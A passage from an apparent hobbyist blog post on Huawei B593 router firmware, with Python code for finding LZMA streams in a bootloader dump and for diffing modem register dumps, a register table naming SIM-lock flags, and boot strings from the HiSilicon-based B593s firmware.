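    return {"offset": off, "props": props, "lc": lc, "lp": lp, "pb": pb,
            "dict_size": dict_size, "uncompressed_size": usize}


def try_decompress(buf, off):
    """Decode the stream at `off` with Python's liblzma; None when it rejects the data,
    which is what the post ran into with the SDK-4.63-era blob. Trailing bytes after
    the stream are ignored, unlike lzma.decompress() which would choke on them."""
    dec = lzma.LZMADecompressor(lzma.FORMAT_ALONE)
    try:
        data = dec.decompress(buf[off:])
    except lzma.LZMAError:
        return None
    return data if dec.eof else None


def find_lzma_streams(buf):
    """Scan every offset like binwalk does and report plausible headers, decoded or not."""
    hits = []
    for off in range(len(buf) - HEADER_LEN + 1):
        hdr = parse_lzma_header(buf, off)
        if hdr is not None:
            hdr["data"] = try_decompress(buf, off)
            hits.append(hdr)
    return hits


def carve(buf, off):
    """The same bytes `dd if=... bs=OFF skip=1` produces above."""
    return buf[off:]


def build_sample(junk_len=300, seed=7):
    """Constructed stand-in for the bootloader dump: junk, a stream made by Python's
    (new) liblzma, more junk. Returns (blob, payload, offset)."""
    payload = b"CFE nvram console_disable=0\n" * 300 + bytes(range(256))
    rng = random.Random(seed)
    junk = bytes(rng.getrandbits(8) for _ in range(junk_len))
    stream = lzma.compress(payload, format=lzma.FORMAT_ALONE)
    return junk + stream + junk[::-1], payload, junk_len


if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as f:           # e.g. 0x000000-0x040000.bootloader
        blob = f.read()
    for h in find_lzma_streams(blob):
        print("%d 0x%X props 0x%02X dict %d size %s decoded %s" % (
            h["offset"], h["offset"], h["props"], h["dict_size"],
            h["uncompressed_size"], "yes" if h["data"] is not None else "no (try lzma_4k)"))
```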

Latest modem.bin LTE dongle firmware for Huawei B593u-12

The latest modem.bin firmwares currently available are the T-Mobile customized 11.533.03.03.748 (2013-09-30) from SP105 and the generic 11.433.61.00.00 (2012-12-04) from Polkomtel SP103. While these are customized for the EM920u, according to a few forum posts I've found they work equally well with Huawei USB LTE dongles such as the E392 that are part of the same MDM9200 family.

The Polkomtel one is generic, as there's no operator ID at the end of the firmware version. Which means T-Mobile has requested some sort of LTE modem firmware customizations from Huawei. I haven't noticed any difference in functionality myself, but depending on your operator there might be some.

You can check the version after opening an SSH connection to the router using the "lteat" command.

# lteat

Vodafone B2000 branded Huawei B593u-12 running T-Mobile SP105 with T-Mobile modem.bin (11.533.03.03.748 / 2013-09-30)
   (0: 1)  (1: 0)  (2: 0)    (3: 0)  (4: 0)  (5: 0)  (6: 0)  (7: 0)
   (8: 0)  (9: 0) (10: 0)   (11: 0) (12: 1) (13: 0) (14: 0) (15: 0) 
  (16: 0) (17: 0) (18: 0)   (19: 0) (20: 0) (21: 0) (22: 0) (23: 1) 
(25: 0 0) (26: 0) (27: 1) (28: 1 1) (29: 1) 

Vodafone B2000 branded Huawei B593u-12 running Polkomtel SP103 with generic modem.bin (11.433.61.00.00 / 2012-12-04)
   (0: 0)  (1: 0)  (2: 0)    (3: 0)  (4: 0)  (5: 0)  (6: 0)  (7: 0) 
   (8: 0)  (9: 0) (10: 0)   (11: 0) (12: 1) (13: 0) (14: 0) (15: 0) 
  (16: 0) (17: 0) (18: 0)   (19: 0) (20: 0) (21: 0) (22: 0) (23: 1) 
(25: 0 0) (26: 0) (27: 0) (28: 1 1) (29: 1) 

Did you spot it? #27 is different. Not that I would have much idea what that means or if it matters. A quick googliohakuplaza search says it doesn't matter as long as the SIM card used works with the modem firmware. So it's not like some frequency would be disabled or other nasties.

This forum post provides a bit more information on these registers, but not much about #27 which we're most interested in.

0       Replace Firmware Version                True
1       ?Forbid 2G registration                 False
2       Forbid AT^CURC type/port                False
3       Change Mean TPT Size                    False
4       Change MTU size                         False
5       Replace Product ID (PID)                False
6       Change APN values                       False
7       Disable Video Calls                     False
8       Change USSD Mode                        False
9       Change? Full Frequency Scan             False
10      ?       LED Light                       False
11      Exclusive Cardlock                      False
12      Huawei Special SIM lock                 True
13      Permanent Cardlock                      False
14      Class-0 SMS Route                       False
15      Roaming HPLMN (count?)                  False
16      Disable RPLMN (PME?)                    False
17      Change GPRS Recent Activity Timer       False
18      Change Default Traffic Class            False
19      Change STK                              False
20      Huawei Manual 3G? band Search Order     False
21      Current ^SYSCFGEX Mode List             False
22      Get/Set Attach PDP Parameters           False
23      Disable F-DPCH (WCDMA)                  True
24      Huawei IPV4 and IPV6 Configuration      N/A
25*     ?       Modified UI Network PLMN        False
26      [1] GID1 Customer Forbid Band           False
27      [1] Start Telus GID1 check              True for T-Mobile, False for generic / Polkomtel
28*     Set HS-DSCH Physical Layer Category     True
29      [1] Set GID1 LTE Band Preference        True

*   Returns 2 digits in E589u-12.
[1] GID1 = "Group Identifier Level 1" and is a type of SIM network
    lockout mechanism. The GID1 elementary files on the SIM are
    specified in GSM 11.11 (ETS 300 977)
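To compare two lteat dumps mechanically instead of by eye, here is an added Python example (not from this post, nor Huawei's or the forum's code) that parses the "(n: v)" entries and labels every differing register with the name from the table above; the register names and the two sample dumps are copied from this page, nothing else is assumed.

```python
import re

# Register names as listed in the forum table above ("?" kept as in the original).
LTEAT_REGISTERS = {
    0: "Replace Firmware Version", 1: "?Forbid 2G registration",
    2: "Forbid AT^CURC type/port", 3: "Change Mean TPT Size", 4: "Change MTU size",
    5: "Replace Product ID (PID)", 6: "Change APN values", 7: "Disable Video Calls",
    8: "Change USSD Mode", 9: "Change? Full Frequency Scan", 10: "? LED Light",
    11: "Exclusive Cardlock", 12: "Huawei Special SIM lock", 13: "Permanent Cardlock",
    14: "Class-0 SMS Route", 15: "Roaming HPLMN (count?)", 16: "Disable RPLMN (PME?)",
    17: "Change GPRS Recent Activity Timer", 18: "Change Default Traffic Class",
    19: "Change STK", 20: "Huawei Manual 3G? band Search Order",
    21: "Current ^SYSCFGEX Mode List", 22: "Get/Set Attach PDP Parameters",
    23: "Disable F-DPCH (WCDMA)", 24: "Huawei IPV4 and IPV6 Configuration",
    25: "? Modified UI Network PLMN", 26: "GID1 Customer Forbid Band",
    27: "Start Telus GID1 check", 28: "Set HS-DSCH Physical Layer Category",
    29: "Set GID1 LTE Band Preference",
}

ENTRY_RE = re.compile(r"\((\d+):\s*([^)]*)\)")  # one "(num: digits)" entry

def parse_lteat(text):
    """Map register number -> tuple of ints. Entries such as '(28: 1 1)' carry
    two digits, so every value is a tuple; registers absent from the dump
    (24 in both outputs above) are simply missing from the result."""
    return {int(n): tuple(int(v) for v in vals.split())
            for n, vals in ENTRY_RE.findall(text)}

def diff_lteat(dump_a, dump_b):
    """Return {register: (name, value_a, value_b)} for every register whose
    value differs between the two dumps (None if absent from one side)."""
    a, b = parse_lteat(dump_a), parse_lteat(dump_b)
    return {n: (LTEAT_REGISTERS.get(n, "unknown"), a.get(n), b.get(n))
            for n in sorted(set(a) | set(b)) if a.get(n) != b.get(n)}

# The two dumps from the post, pasted in as sample input.
TMOBILE = """(0: 1)  (1: 0)  (2: 0)    (3: 0)  (4: 0)  (5: 0)  (6: 0)  (7: 0)
   (8: 0)  (9: 0) (10: 0)   (11: 0) (12: 1) (13: 0) (14: 0) (15: 0)
  (16: 0) (17: 0) (18: 0)   (19: 0) (20: 0) (21: 0) (22: 0) (23: 1)
(25: 0 0) (26: 0) (27: 1) (28: 1 1) (29: 1)"""
GENERIC = """(0: 0)  (1: 0)  (2: 0)    (3: 0)  (4: 0)  (5: 0)  (6: 0)  (7: 0)
   (8: 0)  (9: 0) (10: 0)   (11: 0) (12: 1) (13: 0) (14: 0) (15: 0)
  (16: 0) (17: 0) (18: 0)   (19: 0) (20: 0) (21: 0) (22: 0) (23: 1)
(25: 0 0) (26: 0) (27: 0) (28: 1 1) (29: 1)"""

if __name__ == "__main__":
    for n, (name, va, vb) in diff_lteat(TMOBILE, GENERIC).items():
        print(f"#{n:<2} {name:<40} T-Mobile={va} generic={vb}")
```

Run on the two dumps above it reports #27 and also #0 (Replace Firmware Version), which is 1 in the T-Mobile dump and 0 in the generic one.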

Differences of Huawei B593u and B593s

I got a few B593u models and it's a pretty straightforward Broadcom BCM5358 based router running Linux. As usual the GPL sources were never published by Huawei crooks. The LTE modem side is simply a Qualcomm MDM9200 based Huawei USB dongle connected internally to the Broadcom SoC over USB.

Perhaps luckily I don't have any B593s models, since unpacking the firmware shows it's Huawei HiSilicon Hi6920 (HiSilicon V7R1 paired with Balong 710 baseband) based and runs both VxWorks 6.8 and Android concurrently. Huawei E5172 is probably closely related. From the Huawei code it looks like the VxWorks parts are very much baseband related, leaving the rest of the intelligence to the Android side.

In essence this is much closer to an Android mobile phone or tablet with wired ports than to a traditional broadband router. Perhaps one core runs Android while another runs VxWorks? There are even two different Linux kernels referenced. Are they both used in addition to VxWorks? Hard to say from just the firmware image, as these things are filled with dead code paths and features which never get used.

Partitions present:
BootLoad, NvBackLTE, NvBackGU, BootRom, VxWorks, Logo, FastBoot, kernel, yaffs0 .. yaffs6 and cdromiso.

Balong V7R1 MCore bootloader...
Compile date: May 14 2013
Compile time: 11:54:47
press space key to enter bootrom:
ERROR:too many fails ,VXWORKS region is damaged, switch to BOOTROM.


ARM RealView PBX-A9
HiLteFe(0,0) host:vxWorks h= e= u=anonymous pw= tn=targetname
OM_AutoConfig: The config file is not exsit!
OM_AutoConfig: The Msg Len is too big : %d!
Secure Storage Key
Debug port protect Secure Storage Key
Integrity Protection Key
Secure Storage Key
AT Secure Storage Key
Secure AT Key
RRC_OMITF_ProcMaxTxPowerReq:input ptr null! ulMsgId =, pMsg =
RRC_OMITF_ProcMaxTxPowerReq, MaxTxPower

root=/dev/ram0 rw console=ttyAMA0,115200 console=uw_tty0 rdinit=/init mem=144m
Linux MBB-V7R1-CPE 2.6.32-21-generic #32-Ubuntu SMP Fri Apr 16 08:09:38 UTC 2010 x86_64 GNU/Linux

root=/dev/ram0 rw console=ttyAMA0,115200 rdinit=/linuxrc mem=28M
Linux version (q81003564@MBB-V7R1-CPE) (gcc version 4.5.1 (ctng-1.8.1-FA) ) #1 PREEMPT Tue May 14 11:52:35 CST 2013

on boot
    setprop ARGH ARGH
    setprop net.eth0.dns1
    setprop net.gprs.local-ip
    setprop no
    setprop generic
    setprop ro.product.device generic# mount mtd partitions
# Mount /system rw first to give the filesystem a chance to save a checkpoint
    mount yaffs2 mtd@/yaffs2 /data
    mount yaffs2 mtd@/yaffs1 /system
    mount yaffs2 mtd@/yaffs1 /system ro remount
    mount yaffs2 mtd@/yaffs3 /app
#    mount yaffs2 mtd@/yaffs5 /online
    mount yaffs2 mtd@/yaffs4 /cpedata
        mount yaffs2 mtd@/yaffs4 /cpedata ro remount
#    mount yaffs2 mtd@/yaffs2 /data nosuid nodev
#    mount yaffs2 mtd@cache /cache nosuid nodev
    mkdir /data/userdata
    mkdir /data/equipdata
#service insmodko /etc/
#    oneshot
#service autorun /etc/
#    oneshot
on post-fs
    # once everything is setup, no need to modify /
    mount rootfs rootfs / rw remount
    # We chown/chmod /data again so because mount is run as root + defaults
    chown system system /data
    chmod 0771 /data
    chmod 0771 /app
    chmod 0777 /data/userdata
    chmod 0777 /data/equipdata
service balonginit /bin/balonginit  

start flash read kernel image(offset:0x%x len:0x%x)
finish flash read kernel image(skip_len=0x%x)
start flash read ramdisk image(offset:0x%x len:0x%x)
finish flash read ramdisk image(skip_len=0x%x)
start wait c core...
finish waiting...
kernel  @ %x (%d bytes)
ramdisk @ %x (%d bytes)
mem=50M console=null
cmdline = '%s'
Booting Linux
BalongV7R1 ASIC ACore fastboot...
 hdr is NULL
 Bootimg magic is '%s'